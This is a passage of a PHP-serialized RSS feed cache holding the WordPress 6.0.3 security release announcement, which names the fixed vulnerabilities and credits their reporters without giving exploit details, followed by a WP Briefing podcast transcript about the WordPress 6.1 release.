+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"WordPress.org blog: WordPress 6.0.3 Security Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13618\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6149:\"<p><strong>WordPress 6.0.3</strong> is now available!</p>\n\n\n\n<p>This release features several security fixes. Because this is a <strong>security release</strong>, it is recommended that you update your sites immediately. All versions since WordPress 3.7 have also been updated.</p>\n\n\n\n<p>WordPress 6.0.3 is a short-cycle release. The next major release will be <a href=\"https://make.wordpress.org/core/6-1/\">version 6.1</a> planned for November 1, 2022.</p>\n\n\n\n<p>If you have sites that support automatic background updates, the update process will begin automatically.</p>\n\n\n\n<p>You can <a href=\"https://wordpress.org/wordpress-6.0.3.zip\">download WordPress 6.0.3 from WordPress.org</a>, or visit your WordPress Dashboard, click “Updates”, and then click “Update Now”.</p>\n\n\n\n<p>For more information on this release, please <a href=\"https://wordpress.org/support/wordpress-version/version-6-0-3\">visit the HelpHub site</a>.</p>\n\n\n\n<h2>Security updates included in this release</h2>\n\n\n\n<p>The security team would like to thank the following people for responsibly reporting vulnerabilities, and allowing them to be fixed in this release.</p>\n\n\n\n<ul>\n<li>Stored XSS via wp-mail.php (post by email) &#8211; Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc. via JPCERT</li>\n\n\n\n<li>Open redirect in `wp_nonce_ays` &#8211; <a href=\"https://hackerone.com/devrayn\">devrayn</a></li>\n\n\n\n<li>Sender&#8217;s email address is exposed in wp-mail.php &#8211; Toshitsugu Yoneyama of Mitsui Bussan Secure Directions, Inc. via JPCERT</li>\n\n\n\n<li>Media Library &#8211; Reflected XSS via SQLi &#8211; Ben Bidner from the WordPress security team and Marc Montpas from Automattic independently discovered this issue</li>\n\n\n\n<li>CSRF in wp-trackback.php &#8211; Simon Scannell</li>\n\n\n\n<li>Stored XSS via the Customizer &#8211; Alex Concha from the WordPress security team</li>\n\n\n\n<li>Revert shared user instances introduced in <a href=\"https://core.trac.wordpress.org/changeset/50790\">50790</a> &#8211; Alex Concha and Ben Bidner from the WordPress security team</li>\n\n\n\n<li>Stored XSS in WordPress Core via Comment Editing &#8211; Third-party security audit and Alex Concha from the WordPress security team</li>\n\n\n\n<li>Data exposure via the REST Terms/Tags Endpoint &#8211; Than Taintor</li>\n\n\n\n<li>Content from multipart emails leaked &#8211; <a href=\"https://profiles.wordpress.org/kraftner\">Thomas Kräftner</a></li>\n\n\n\n<li>SQL Injection due to improper sanitization in `WP_Date_Query` &#8211; <a href=\"https://www.gold-network.ch\">Michael Mazzolini</a></li>\n\n\n\n<li>RSS Widget: Stored XSS issue &#8211; Third-party security audit</li>\n\n\n\n<li>Stored XSS in the search block &#8211; Alex Concha of the WP Security team</li>\n\n\n\n<li>Feature Image Block: XSS issue &#8211; Third-party security audit</li>\n\n\n\n<li>RSS Block: Stored XSS issue &#8211; Third-party security audit</li>\n\n\n\n<li>Fix widget block XSS &#8211; Third-party security audit</li>\n</ul>\n\n\n\n<h2>Thank you to these WordPress contributors</h2>\n\n\n\n<p>This release was led by <a href=\"https://profiles.wordpress.org/xknown\">Alex Concha</a>, <a href=\"https://profiles.wordpress.org/peterwilsoncc\">Peter Wilson</a>, <a href=\"https://profiles.wordpress.org/audrasjb\">Jb Audras</a>, and <a href=\"https://profiles.wordpress.org/SergeyBiryukov\">Sergey Biryukov</a> at mission control. Thanks to <a href=\"https://profiles.wordpress.org/desrosj/\">Jonathan Desrosiers</a>, <a href=\"https://profiles.wordpress.org/jorgefilipecosta/\">Jorge Costa</a>, <a href=\"https://profiles.wordpress.org/bernhard-reiter/\">Bernie Reiter</a> and <a href=\"https://profiles.wordpress.org/cbravobernal/\">Carlos Bravo</a> for their help on package updates.</p>\n\n\n\n<p>WordPress 6.0.3 would not have been possible without the contributions of the following people. Their asynchronous coordination to deliver several fixes into a stable release is a testament to the power and capability of the WordPress community.</p>\n\n\n\n<p class=\"is-style-default\"><a href=\"https://profiles.wordpress.org/xknown/\">Alex Concha</a>, <a href=\"https://profiles.wordpress.org/costdev/\">Colin Stewart</a>, <a href=\"https://profiles.wordpress.org/talldanwp/\">Daniel Richards</a>, <a href=\"https://profiles.wordpress.org/davidbaumwald/\">David Baumwald</a>, <a href=\"https://profiles.wordpress.org/dd32/\">Dion Hulse</a>, <a href=\"https://profiles.wordpress.org/ehtis/\">ehtis</a>, <a href=\"https://profiles.wordpress.org/voldemortensen/\">Garth Mortensen</a>, <a href=\"https://profiles.wordpress.org/audrasjb/\">Jb Audras</a>, <a href=\"https://profiles.wordpress.org/johnbillion/\">John Blackbourn</a>, <a href=\"https://profiles.wordpress.org/johnjamesjacoby/\">John James Jacoby</a>, <a href=\"https://profiles.wordpress.org/desrosj/\">Jonathan Desrosiers</a>, <a href=\"https://profiles.wordpress.org/jorgefilipecosta/\">Jorge Costa</a>, <a href=\"https://profiles.wordpress.org/jrf/\">Juliette Reinders Folmer</a>, <a href=\"https://profiles.wordpress.org/rudlinkon/\">Linkon Miyan</a>, <a href=\"https://profiles.wordpress.org/martinkrcho/\">martin.krcho</a>, <a href=\"https://profiles.wordpress.org/matveb/\">Matias Ventura</a>, <a href=\"https://profiles.wordpress.org/mukesh27/\">Mukesh Panchal</a>, <a href=\"https://profiles.wordpress.org/paulkevan/\">Paul Kevan</a>, <a href=\"https://profiles.wordpress.org/peterwilsoncc/\">Peter Wilson</a>, <a href=\"https://profiles.wordpress.org/noisysocks/\">Robert Anderson</a><a href=\"https://profiles.wordpress.org/robinwpdeveloper/\">Robin</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov/\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/sumitbagthariya16/\">Sumit Bagthariya</a>, <a href=\"https://profiles.wordpress.org/tykoted/\">Teddy Patriarca</a>, <a href=\"https://profiles.wordpress.org/timothyblynjacobs/\">Timothy Jacobs</a>, <a href=\"https://profiles.wordpress.org/vortfu/\">vortfu</a>, and <a href=\"https://profiles.wordpress.org/chesio/\">Česlav Przywara</a>.</p>\n\n\n\n<p class=\"has-text-align-right has-small-font-size\"><em>Thanks to <a href=\"https://profiles.wordpress.org/peterwilsoncc/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>peterwilsoncc</a> for proofreading.</em></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 17 Oct 2022 22:55:55 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Jb Audras\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:99:\"WordPress.org blog: WP Briefing: Episode 41: WordPress 6.1 Sneak Peek with Special Guest Nick Diego\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/news/?post_type=podcast&p=13578\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"https://wordpress.org/news/2022/10/episode-41-wordpress-6-1-sneak-peek-with-special-guest-nick-diego/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:24119:\"<p>In the forty-first episode of the WordPress Briefing, peek into the upcoming WordPress 6.1 release with our host, Josepha Haden Chomphosy, and the release&#8217;s Editor Triage Lead, Nick Diego. </p>\n\n\n\n<p><em><strong>Have a question you&#8217;d like answered? You can submit them to <a href=\"mailto:wpbriefing@wordpress.org\">wpbriefing@wordpress.org</a>, either written or as a voice recording.</strong></em></p>\n\n\n\n<h2>Credits</h2>\n\n\n\n<p>Editor:&nbsp;<a href=\"https://profiles.wordpress.org/dustinhartzler/\">Dustin Hartzler</a><br />Logo:&nbsp;<a href=\"https://profiles.wordpress.org/javiarce/\">Javier Arce</a><br />Production:&nbsp;<a href=\"https://profiles.wordpress.org/santanainniss/\">Santana Inniss</a><br />Song: Fearless First by Kevin MacLeod </p>\n\n\n\n<h2>Guests</h2>\n\n\n\n<p><a href=\"https://profiles.wordpress.org/ndiego/\">Nick Diego</a></p>\n\n\n\n<h2>References</h2>\n\n\n\n<p><a href=\"https://make.wordpress.org/mobile/2022/10/04/call-for-testing-wordpress-for-android-20-9/\">Call for Testing for WordPress for Android 20.9</a><br /><a href=\"https://wordpress.org/news/2022/10/wordpress-6-1-release-candidate-2-now-available/\">RC2 WordPress 6.1</a> <br /><a href=\"https://make.wordpress.org/core/2022/10/10/multisite-improvements-in-wordpress-6-1/\">Multisite Improvements</a><br /><a href=\"https://make.wordpress.org/core/2022/10/10/block-styles-generation-style-engine/\">Block Style Generation Tool</a><br /><a href=\"https://make.wordpress.org/core/2022/10/10/changes-to-block-editor-preferences-in-wordpress-6-1/\">Editor Preferences Changes</a><br /><a href=\"https://make.wordpress.org/core/2022/09/14/6-1-product-walk-through-recap/\">WordPress 6.1 Walkthrough </a></p>\n\n\n\n<h2>Transcript</h2>\n\n\n\n<span id=\"more-13578\"></span>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:00:00]&nbsp;</strong></p>\n\n\n\n<p>Hello everyone. And welcome to the WordPress Briefing, the podcast where you can catch quick explanations of the ideas behind the WordPress open source project, some insight into the community that supports it, and get a small list of big things coming up in the next two weeks.</p>\n\n\n\n<p>I&#8217;m your host, Josepha Haden Chomphosy. Here we go.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:00:40]&nbsp;</strong></p>\n\n\n\n<p>And today I have with me Nick Diego. Welcome, Nick, to the WordPress Briefing.</p>\n\n\n\n<p><strong>[Nick Diego 00:00:44]&nbsp;</strong></p>\n\n\n\n<p>Thank you so much for having me.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:00:46]&nbsp;</strong></p>\n\n\n\n<p>Yeah. Before we get started, why don&#8217;t you tell me a bit about yourself, just kind of your history with WordPress and then what it is that you&#8217;ve been doing with the WordPress 6.1 release squad.</p>\n\n\n\n<p><strong>[Nick Diego 00:00:56]</strong></p>\n\n\n\n<p>Yeah, so I&#8217;m actually kind of new to working with WordPress full-time. Up until about June of last year, I was in the hospitality industry for a career of 10 years. But I always loved doing WordPress on the side. And after the long pandemic, I figured it was time to kind of pursue my passion and work with WordPress full-time.</p>\n\n\n\n<p>And that ultimately led to my current role as a developer advocate at WPEngine, where I focus primarily on WordPress and contribution to Core itself. And then I guess it was maybe March or April this year when <a href=\"https://profiles.wordpress.org/annezazu/\">Anne McCarthy</a>, who I&#8217;ve worked with a ton, she asked me if I&#8217;d be interested in helping out on 6.0 as an Editor Triage Lead which was an awesome experience.</p>\n\n\n\n<p>And now I&#8217;m back for 6.1.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:01:37]&nbsp;</strong></p>\n\n\n\n<p>That&#8217;s excellent. I always like to hear about people who are coming to do repeat tours of duty.</p>\n\n\n\n<p><strong>[Nick Diego 00:01:43]</strong></p>\n\n\n\n<p>Yes, exactly.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:01:44]&nbsp;</strong></p>\n\n\n\n<p>I probably shouldn&#8217;t refer to working on WordPress releases as a tour of duty. However, I find that releases are so large and complex, and there are so many people in there now that working on them takes an entirely different skill set now than it used to take when WordPress was like 1% of the web.</p>\n\n\n\n<p>And so I think it&#8217;s a really big task, and I think it&#8217;s great when people were, like, that was either so good that I would do it again, or I would like a second go because I could do it better. Whichever way brings people to it. So, yeah.</p>\n\n\n\n<p><strong>[Nick Diego 00:02:18]&nbsp;</strong></p>\n\n\n\n<p>No, I was just gonna say that&#8217;s a great point because the Editor Triage Lead, which is the role that I currently have, was a brand new role for 6.0. The project kind of got so big that it kind of made sense to have a triage lead focused specifically on Gutenberg. Gutenberg&#8217;s such a big part of WordPress now.</p>\n\n\n\n<p>And so that&#8217;s where that role kind of came from, and now we&#8217;ve carried it over to 6.1. As the project grows, we need more people to come in and help make sure the release is as smooth as it can be.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:02:42]</strong></p>\n\n\n\n<p>Yes. Because of that promise of backward compatibility and all the things.</p>\n\n\n\n<p><strong>[Nick Diego 00:02:47]</strong></p>\n\n\n\n<p>Exactly.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:02:48]&nbsp;</strong></p>\n\n\n\n<p>Cool. So, by the time this releases, if I recall correctly, we will have passed RC2, or RC2 is coming the next day or something like that. We&#8217;re right around the Release Candidate two. So you have been doing this for quite some time on this particular release. So far, what is the feature that you&#8217;re most excited about that&#8217;s going out in the 6.1 release?</p>\n\n\n\n<p><strong>[Nick Diego 00:03:09]&nbsp;</strong></p>\n\n\n\n<p>So, this is going to sound really boring, but it&#8217;s actually incredibly exciting. So, the most exciting quote-unquote feature that I&#8217;m excited about is the improved consistency and standardization of block controls that are coming in 6.1. So things like typography and color and borders and dimensions.</p>\n\n\n\n<p>These are things and tools that we&#8217;ve had in a lot of core blocks, but it hasn&#8217;t been consistent throughout. And a ton of work has been done in 6.1 to establish that consistency. We&#8217;re not a hundred percent there, but typography, I think we&#8217;re at like 85% of all core blocks now support all the typography controls, and with each release as we head to 6.2, we&#8217;ll improve on that.</p>\n\n\n\n<p>But it&#8217;s really great for theme builders, theme designers, and users to be able to control the look and feel blocks consistently throughout the editor.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:03:58]&nbsp;</strong></p>\n\n\n\n<p>I was gonna immediately answer you earlier with like, there are no boring answers, there are no boring improvements. And as you were explaining why it is that you kind of thought it might be considered boring, I think it&#8217;s fair to say that anytime that you&#8217;re increasing the consistency and you&#8217;re increasing the confidence between what you saw on the back end and what you actually shipped on the front end– anytime you&#8217;re doing that, I think that that is exciting in the prove the negative way.&nbsp;</p>\n\n\n\n<p>If you think about the negative excitement that occurs when you have published something, and it looks one way in the back end, and then it looks totally different on the front end, and the panic you feel when you have to fix. Not having that is a really big step up, I think. And so anything that provides more consistency for people who are using WordPress, people who are building with WordPress, I always find exciting. But also, like, I&#8217;m an office person, and so I would find office things exciting, right?</p>\n\n\n\n<p><strong>[Nick Diego 00:04:53]&nbsp;</strong></p>\n\n\n\n<p>It creates a more delightful experience. I do a lot of work on the Training team, doing educational things, and we teach people how to change typography and change color. Once they learn how to do it in one block, if they can take that same skill set and apply it to any other block, it&#8217;s that light bulb moment. They understand they know how to manipulate and use WordPress to its fullest. So adding that consistency really helps to level up users.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:05:15]&nbsp;</strong></p>\n\n\n\n<p>Yeah, I&#8217;m gonna take us off track a little bit and just ask a general question here. Like, I remember the first time that I was working with what was a site, I guess, qualified for a site at the time. And I remember the first time that I discovered that I could change the look and feel with HTML and CSS, and I did that.</p>\n\n\n\n<p>Also was like, well, I accept my fate. Whatever happens, if I kill everything I&#8217;ve ever written, that is just how it&#8217;ll be. Like the sheer terror of all of that is so different now. Do you recall that first moment where you&#8217;re like, Oh, I do have some power over this? I have some control over this, and whether you also found it scary.</p>\n\n\n\n<p><strong>[Nick Diego 00:05:52]</strong></p>\n\n\n\n<p>So I came to WordPress kinda as a hobby and website development kind of as a hobby. So I was kind of always in that tinkering phase, or I wasn&#8217;t building something for anyone else. I was in a safe place to destroy whatever I was working on with my tinkering. So I never really quite had that fear, but I can definitely see it from the perspective of building something for somebody else.</p>\n\n\n\n<p>But you&#8217;re right, the editor and the controls that we have, and you know, now make it a lot easier to kind of manipulate and exert your creative desires in WordPress than it was before with CSS.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:06:23]&nbsp;</strong></p>\n\n\n\n<p>I love the phrase ‘I was safe to destroy things, ’ and if I can figure out a way to make it a tagline for something, I will.</p>\n\n\n\n<p><strong>[Nick Diego 00:06:30]&nbsp;</strong></p>\n\n\n\n<p>Exactly.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:06:31]&nbsp;</strong></p>\n\n\n\n<p>Alright. So during your second time around here on the release squad with 6.1, what have been the bright spots of that experience, and have there been any unexpected challenges of being on the release squad?</p>\n\n\n\n<p><strong>[Nick Diego 00:06:44]</strong></p>\n\n\n\n<p>Again, I come to WordPress from, you know, from a different career. It&#8217;s kind of a passion of mine to be working with WordPress. So I kinda have a unique experience than maybe some others. And when I approach WordPress, there&#8217;s always that tendency to say, ‘why doesn&#8217;t it do this?’ Or ‘why don&#8217;t they do this?’ And I&#8217;ve always been the person…, well, it&#8217;s open source. We, we, we can, we can</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:07:05]&nbsp;</strong></p>\n\n\n\n<p>…can do it</p>\n\n\n\n<p><strong>[Nick Diego 00:07:05]&nbsp;</strong></p>\n\n\n\n<p>…we can do it. And so that&#8217;s kind of how I approach things. Now, of course, you know, I have the privilege of time to do that. Not everybody does, but one of the unexpected bright spots about working in a release squad is understanding how it all works.&nbsp;</p>\n\n\n\n<p>How does WordPress actually get built? What is the process that it goes through? It was just eye-opening to me, and I really got a shout-out, Anne, for inviting me to be on 6.0. It brought me in. I learned so much about it, and now I&#8217;m just excited to keep working on these releases.</p>\n\n\n\n<p>But a release is hard. You know, it&#8217;s a… WordPress is huge. There are a lot of moving parts, there are a lot of things going on. Right now, we&#8217;re trying to get everything ready for the first release candidate. So being on the release squad is not an easy job. But it&#8217;s exciting, it&#8217;s fun, and you really feel like you&#8217;re part of that ‘we’ really helping to build WordPress.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:07:53]&nbsp;</strong></p>\n\n\n\n<p>One of the things that I hope that people have learned from any time that they spent working with me is that like we understand here in the WordPress open source project, and I believe that all open source projects must understand this, but like every change that you make, if there are things that are dependent on it, which is gonna be true for most of us, we&#8217;ll have intended consequences and also unexpected consequences, and unintended, unexpected consequences.&nbsp;</p>\n\n\n\n<p>And so I&#8217;ve always felt like the thing that really makes the biggest difference about how we do open source in WordPress is that, for the most part, we have a concept of where the most likely changes are going to happen across our entire ecosystem.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:08:40]&nbsp;</strong></p>\n\n\n\n<p>We have a better understanding, at least compared to when I got here, a better understanding of how interconnected it all is. And so you&#8217;ve got this change here, and it looks small, but it&#8217;s gonna have this positive or negative impact as you kind of work your way out from it. And so I think that that is an interesting thing, and certainly, you get a really clear concept of it in the release squad, I think.</p>\n\n\n\n<p><strong>[Nick Diego 00:09:02]</strong></p>\n\n\n\n<p>Oh, absolutely. If you were to build something like the block editor without caring at all about backward compatibility, you&#8217;d be done by now, right? I mean, so much of what we do is concerning ourselves with making sure that everybody who&#8217;s on a classic theme or hybrid theme or whatever it might be that they continue to use WordPress in a safe and stable way.</p>\n\n\n\n<p>This is part of being such a large content management system.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:09:24]&nbsp;</strong></p>\n\n\n\n<p>So you already told us the feature that you&#8217;re most excited about, and so now I&#8217;m gonna ask you about what feature or what bug fix has the most notable improvements that are coming to 6.1. This is a little different as in, like, there&#8217;s the thing you&#8217;re excited about, which is an office thing, but like a thing that is maybe not new but has the biggest delta, the biggest change to anyone&#8217;s experience of it.</p>\n\n\n\n<p><strong>[Nick Diego 00:09:51]&nbsp;</strong></p>\n\n\n\n<p>Yeah, so obviously, in 5.9, we introduced full site editing, and 6.0 was a natural progression from that with more and more features. Now it&#8217;s safe to say that there&#8217;s only a small fraction of websites that are using the whole full site editing of or block themes, all that kind of stuff. One of the hangups about that was managing templates inside of the site editor.</p>\n\n\n\n<p>You could add the files to your theme, which would then show up in the site editor. But there wasn&#8217;t a direct way to add more complicated templates within the site editor itself. That is changing in 6.1. So now you actually have the functionality to install something like 2023, which is the new core theme, and build out all these very complicated templates within the UI of the site editor that you could not have done before.</p>\n\n\n\n<p><strong>[Nick Diego 00:10:38]</strong>&nbsp;</p>\n\n\n\n<p>I personally think that the biggest benefit of full site editing is really to empower no-code or low-code users. And the ability to add these templates directly in the UI really levels them up. Because now, you can do all that complicated stuff that you normally would need to be adding to theme files and jumping into the code. You can do that within the site editor now, which I think is fantastic.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:10:59]&nbsp;</strong></p>\n\n\n\n<p>That&#8217;s great. And just a general caveat, anytime that we talk about anything that&#8217;s very developer-y or very no code-y, I think it&#8217;s always worth mentioning, yes, a lot of what we&#8217;re trying to do with the block editor is to just kind of give some power back to folks who cannot find the time to become a developer or don&#8217;t have the inclination. They don&#8217;t want to do that.&nbsp;</p>\n\n\n\n<p>But that does not mean that no code is ever involved in WordPress. It&#8217;s still a software. You can still do very complicated things with it. And if you are a developer, you should not think to yourself, ‘oh now that it&#8217;s being available to low code/no code users, that means you don&#8217;t want me.’</p>\n\n\n\n<p>Like, that&#8217;s not at all what&#8217;s happening. You can do very complicated things still.&nbsp;</p>\n\n\n\n<p><strong>[Nick Diego 00:11:42]&nbsp;</strong></p>\n\n\n\n<p>A hundred percent. A hundred percent. Absolutely.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:11:45]&nbsp;</strong></p>\n\n\n\n<p>Alright, so that brings us to our final question here because we like to stay as true to the name as possible here on the WP Briefing. If someone were wanting to get involved with the next release, so WP 6.2, how would they do that?</p>\n\n\n\n<p><strong>[Nick Diego 00:12:01]</strong></p>\n\n\n\n<p>So, talk to Anne, and she&#8217;ll get you set up. No, I&#8217;m just kidding. So at the, after each release, there&#8217;s a posting that goes out that lists all the different release teams, and you can just put your name out there and ask to be, you know, for consideration to be part of the team.</p>\n\n\n\n<p>However, I will say that the best thing you can do right now is help with 6.1. You don&#8217;t necessarily need to be a release lead to do that testing, helping with bug fixes. Reach out to me. Reach out to other release leads, and we&#8217;ll get you involved and engaged with the release. That will give you a really good framework to start working and become a release lead for 6.2.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:12:37]&nbsp;</strong></p>\n\n\n\n<p>Yeah. I think we talked maybe two or three episodes ago, or it could be more than that, I&#8217;ll never know, about the release squad, like the group that&#8217;s doing that. In the event you think to yourself, ‘there&#8217;s no way in a million years that I&#8217;m gonna just show up tomorrow and be part of the release squad,’ I heard what they said in the first question/answer moment– that&#8217;s fine, too.&nbsp;</p>\n\n\n\n<p>As Nick mentioned, you can always get involved with testing, you can get involved with triage. Those are areas where any feedback at all is valuable because we can get better information about what worked and didn&#8217;t, what was expected versus what happened. And that type of information is where all of our co-creators of the WordPress software–really, we rely on what you all are pointing out to us.&nbsp;</p>\n\n\n\n<p>If you&#8217;re not shining spotlights on the most painful parts of your experience, sometimes we don&#8217;t necessarily know that that&#8217;s a pain point for anyone.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:13:34]</strong>&nbsp;</p>\n\n\n\n<p>And so yeah, that&#8217;s a great place to start. If you are more of a writer, technical or prose, there are different spaces you can go to, like keep our docs up to date or make sure that people know that changes are coming at all in WordPress because that&#8217;s a thing. If you are a backend developer, we have a million things you can do because that&#8217;s just all day, every day, for WordPress.</p>\n\n\n\n<p>It&#8217;s just all the deep backend work. And so yeah.</p>\n\n\n\n<p><strong>[Nick Diego 00:13:58]&nbsp;</strong></p>\n\n\n\n<p>I did want to mention that, you know, being on the release team does not necessarily mean that you&#8217;re incredibly technical. We have a documentation lead, we have a design lead, you know, a communication lead. So there&#8217;s a lot of different roles in the team that, you know, across all disciplines.</p>\n\n\n\n<p>So don&#8217;t think if you&#8217;re not a hardcore developer, that precludes you from being on the team.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:14:19]&nbsp;</strong></p>\n\n\n\n<p>Yeah, and if you&#8217;re really good with common sense and working fully remotely, you can be the release coordinator. I can tell you because I did that for 5.0. It was a big job. It was our, it was the first time we had a release squad as opposed to just like the release lead.</p>\n\n\n\n<p>Because there was just so much that was going into that and so much riding on it. And like you said in some other answer that you gave like if you were to just be like, we&#8217;re shutting everything down and rewriting this in six months, and I hope you can come with us on it. Like a lot of open source projects do it that way.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:14:51]</strong>&nbsp;</p>\n\n\n\n<p>And that is a choice, and we made the opposite choice. And so we&#8217;re bringing all of our co-conspirators with us, all of our co-creators of WordPress. That&#8217;s the hope all the time. Making sure that they have enough information, that they feel safe to destroy things, enough information, and skills about how to get out of it, that they always feel some high confidence in what they&#8217;re trying to do versus what they actually did do.</p>\n\n\n\n<p>So, yeah, excellent. Nick, do you have any final thoughts for our listeners?</p>\n\n\n\n<p><strong>[Nick Diego 00:15:20]&nbsp;</strong></p>\n\n\n\n<p>Nope. I just hope everybody goes out and downloads 6.1 and enjoys it as much as I am.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:15:25]&nbsp;</strong></p>\n\n\n\n<p>Yeah, go check it out.&nbsp;</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:15:28]&nbsp;</strong></p>\n\n\n\n<p>That brings us now to our small list of big things. And actually, it is a pretty big list today, but still pretty big things too. So first up, we have a call for testing that is out, and it is for our Android users.</p>\n\n\n\n<p>There is a call for testing for WordPress for Android 20.9, and I feel like we don&#8217;t get a lot of calls for testing for Android devices. And so if you have been feeling left out or just like we don&#8217;t always have that kind of mobile testing available, this is the opportunity for you.&nbsp;</p>\n\n\n\n<p>The next thing is that tomorrow, we have RC2, release candidate two for WordPress 6.1.</p>\n\n\n\n<p>That&#8217;s coming out on October 18th. There will be a link in the show notes, but that means if you write a plugin or a theme or have anything that kind of extends the core of WordPress, now is the time to start testing anything that might be a bug or represent a breaking change and make sure that you file those bugs so that we can get things as settled and excellent as possible.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:16:40]&nbsp;</strong></p>\n\n\n\n<p>And speaking of Word points, uh, WordPress 6.1, not Word point, WordPress 6.1. I actually have three changes that I think are going to represent some pretty big changes for folks. I will have links to all of these in the show notes. If you don&#8217;t know where the show notes are, it&#8217;s on wordpress.org/news/podcast.</p>\n\n\n\n<p>So the three things that I think are gonna be big, worthwhile things. The first one is multisite improvements, and the second one will be the style engine that&#8217;s block styles generation tool, which will ship in Core and I think is really important for y&#8217;all to take a look at. And then also there are some changes coming to the block editor preferences.<br /><br />Like I said, links to all of those are going to be in the show notes, and so they should be pretty easy for you to find. But also, if you want to just get a general look at everything that&#8217;s coming in 6.1, we did a walkthrough that I will link to in the show notes as well, and you can get a full understanding of what is going to be coming early in November.</p>\n\n\n\n<p><strong>[Josepha Haden Chomphosy 00:17:45]&nbsp;</strong></p>\n\n\n\n<p>And that, my friends, is your small list –big list– of big things. Thanks for tuning in today for the WordPress Briefing. I&#8217;m your host, Josepha Haden Chomphosy, and I&#8217;ll see you again in a couple of weeks.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 17 Oct 2022 12:00:00 